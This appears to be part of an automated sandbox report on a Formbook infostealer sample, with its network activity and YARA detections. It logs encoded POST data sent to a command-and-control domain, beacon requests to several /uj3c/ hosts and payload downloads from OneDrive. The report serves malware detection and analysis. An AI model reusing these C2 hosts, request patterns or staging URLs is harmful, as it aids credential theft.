            Source: unknownHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
            Source: unknown DNS traffic detected: queries for: onedrive.live.com
            Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1 User-Agent: lVali Host: onedrive.live.com
            Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1 User-Agent: Host: onedrive.live.com Cookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
            Source: global traffic HTTP traffic detected: GET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1 User-Agent: lVali Host: 2q5ira.ph.files.1drv.com Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1 User-Agent: Host: 2q5ira.ph.files.1drv.com Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1 User-Agent: lVali Host: onedrive.live.com Cookie: wla42=
            Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1 User-Agent: 6 Host: onedrive.live.com Cookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
            Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1 Host: www.meigsbuilds.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1 Host: www.naturathome.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1 Host: www.nutricognition.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1 Host: www.designgamagazine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1 Host: www.kidsfundoor.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1 Host: www.empireapothecary.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1 Host: www.moneytaoism.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1 Host: www.trendiddas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1 Host: www.trisuaka.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1 Host: www.nomaxdic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
            Source: Jwjxmakrv.exe, 00000008.00000002.323528611.00000000007FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: TR0627729920002.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
